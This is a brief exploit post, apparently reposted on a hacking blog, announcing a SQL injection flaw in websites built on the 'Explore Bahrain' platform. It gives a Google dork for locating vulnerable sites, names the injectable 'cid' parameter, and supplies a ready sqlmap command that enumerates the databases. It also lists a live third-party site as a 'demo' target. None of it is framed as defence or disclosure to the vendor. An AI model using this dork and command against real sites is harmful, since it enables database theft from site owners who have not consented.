SQL Injection Vulnerability [ Powered by Explore Bahrain ]

 Exploit Title: SQL Injection Vulnerability [ Powered by Explore Bahrain ]

|[+]

|[+] Exploit Author: 1337r00t

|[+]

|[+] Exploit Team Author: T34m D4rkn3ss R00m

|[+]

|[+] Vendor Homepage: http://www.explorebahrain.com

|[+]

|[+] Google Dork: intext:Powered by Explore Bahrain ” inurl:?cid=

|[+]

|[+] Tested on: Mozilla Firefox , SQLMAP

|[+]

|[+] Date: 31/7/2016

|[+]

|————————————————————–|

|[+] Exploit :-

|[+]

|[+] http://%5B$Site%5D.php?cid=%5BSQL%5D

|[+]———————————————————–|

|[+] p0c :-

|[+]

|[+] Open SQLMAP :-

|[+] ./sqlmap.py -u http://%5B$Site%5Dproducts.php?cid=%5BSQL%5D –dbs –batch

|[+]

|————————————————————–|

|[+] Demo:-

|[+]

|[+] http://www.arepro.bh/products.php?cid=6′

|[+]

Add Comment

öztürk, öztürk blog, öztürk hack, öztürkhack

5 Ağustos 2017 Cumartesi

Share

Like

G+

Tweet

Tweet

Related Posts